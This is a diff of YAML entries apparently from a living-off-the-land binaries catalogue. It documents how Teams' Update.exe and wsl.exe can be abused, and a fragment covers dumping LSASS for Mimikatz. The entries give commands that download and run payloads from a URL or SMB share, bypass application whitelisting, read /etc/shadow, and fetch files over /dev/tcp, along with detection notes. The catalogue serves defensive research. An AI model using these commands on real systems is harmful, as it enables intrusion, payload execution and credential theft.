Description: 0x01100:40 flag will create a Mimikatz compatibile dump file. Description: 0x01100:40 flag will create a Mimikatz compatible dump file.
Usecase: Dump LSASS.exe to Mimikatz compatable dump uisng PID. Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
Category: Dump Category: Dump
Privileges: Administrator Privileges: Administrator
MitreID: T1003 MitreID: T1003

View File

@ -1,9 +1,65 @@
--- ---
Name: Update.exe Name: Update.exe
Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case) Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Mr.Un1k0d3r' Author: 'Oddvar Moe'
Created: '2019-06-26' Created: '2019-06-26'
Commands: Commands:
- Command: Update.exe --download [url to package]
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args" - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass Usecase: Application Whitelisting Bypass
@ -12,6 +68,22 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args" - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary Usecase: Execute binary
@ -21,12 +93,25 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path: Full_Path:
- Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe' - Path: '%localappdata%\Microsoft\Teams\update.exe'
Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection: Detection:
- IOC: Update.exe spawned an unknown process - IOC: Update.exe spawned an unknown process
Resources: Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
- Link: https://twitter.com/reegun21/status/1291005287034281990
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
- Link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/
Acknowledgement: Acknowledgement:
- Person: Reegun Richard Jayapaul (SpiderLabs, Trustwave)
Handle: '@reegun21'
- Person: Mr.Un1k0d3r - Person: Mr.Un1k0d3r
Handle: '@MrUn1k0d3r' Handle: '@MrUn1k0d3r'
- Person: Adam
Handle: '@Hexacorn'
--- ---

View File

@ -20,6 +20,22 @@ Commands:
MitreID: T1202 MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202 MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 10, Windows 19 Server OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --exec bash -c 'cat file'
Description: Cats /etc/shadow file as root
Usecase: Performs execution of arbitrary Linux commands.
Category: Execute
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1202
MitreLink: https://attack.mitre.org/techniques/T1202
OperatingSystem: Windows 10, Windows 19 Server
Full_Path: Full_Path:
- Path: C:\Windows\System32\wsl.exe - Path: C:\Windows\System32\wsl.exe
Code_Sample: Code_Sample:
@ -33,4 +49,6 @@ Acknowledgement:
Handle: '@aionescu' Handle: '@aionescu'
- Person: Matt - Person: Matt
Handle: '@NotoriousRebel1' Handle: '@NotoriousRebel1'
- Person: Asif Matadar
Handle: '@d1r4c'
--- ---

View File

@ -1,83 +0,0 @@
---
Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Oddvar Moe'
Created: '2019-06-26'
Commands:
- Command: Update.exe --download [url to package]
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRoolback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path:
- Path: '%localappdata%\Microsoft\Teams\update.exe'
Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection:
- IOC: Update.exe spawned an unknown process
Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
- Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
- Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
Acknowledgement:
- Person: Reegun J (OCBC Bank)
Handle: '@reegun21'
- Person: Mr.Un1k0d3r
Handle: '@MrUn1k0d3r'
- Person: Adam
Handle: '@Hexacorn'
---